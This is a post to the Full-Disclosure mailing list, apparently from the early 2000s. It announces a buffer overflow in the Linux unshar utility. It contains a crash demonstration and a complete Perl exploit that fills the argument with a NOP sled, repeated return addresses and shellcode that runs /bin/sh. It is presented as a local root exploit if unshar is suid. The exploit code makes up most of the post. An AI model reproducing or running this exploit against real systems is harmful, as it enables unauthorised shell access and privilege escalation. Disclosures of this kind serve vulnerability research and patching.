[Full-Disclosure] flames security group start to play , yet another vuln found (rustymemory and welshboi)

[rustymemory <rustymemory@cisco-ninjas.com>]

By: flames.bluefox.net.nz
if unshar suid; then you w00t

proof of concept?

rustymemory@flames:~$ unshar -f `perl -e 'print"A"x2000'`
............................AAAAAAAAAAAAAASegmentation fault

welshboi@flames:~$ more unshar.pl
#!/usr/bin/perl
#/usr/bin/unshar local sploit.
#coded by welshboi (deadbeat)
#found by rustymemory
#
#FLAMES SECURITY GROUP
#Private, please dont distribute
#affects all linux distributions , tested on slackware 9.1 and MDK
###############################################
#[deadbeat@pikachu sploits]$ perl unshar.pl #
# #
#[] /usr/bin/unshar exploit #
#[] coded by: deadbeat [] #
#[] found by: rustymemory [] #
#_f1GWugHu[SPZ #
# #
#sh-2.05b$ #
###############################################
# 47byte shellcode (exec /bin/sh)
$hell = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
"\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01";
$egg = 2000;
$buf = 1128;
$nop = "\x90";
$offset = 0;
$ret =0x40055bdc;
if(@ARGV == 1) {$offset = $ARGV[0];}
$addr = pack('l', ($ret + $offset));
for($i = 0; $i<$buf; $i += 4){$evil .=$addr;}
for($i = 0; $i<($egg - length($hell) -100); $i++){$evil .=$nop;}
$evil .= $hell;
print "\n[] /usr/bin/unshar exploit []\n";
print "[] coded by: deadbeat, uk2sec []\n";
print "[] found by: rustymemory []\n\n";
print ("[]trying addr: 0x", sprintf('%lx',($ret + $offset)),"\n");
system("/usr/bin/unshar -f $evil");

---------------------------------------------------------
shouts to ?

calidan(daddeh) , linucks ( wifi whore) , h0stile (the maniac) , and the rest 
of flames security group. and rusty's fiancee

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html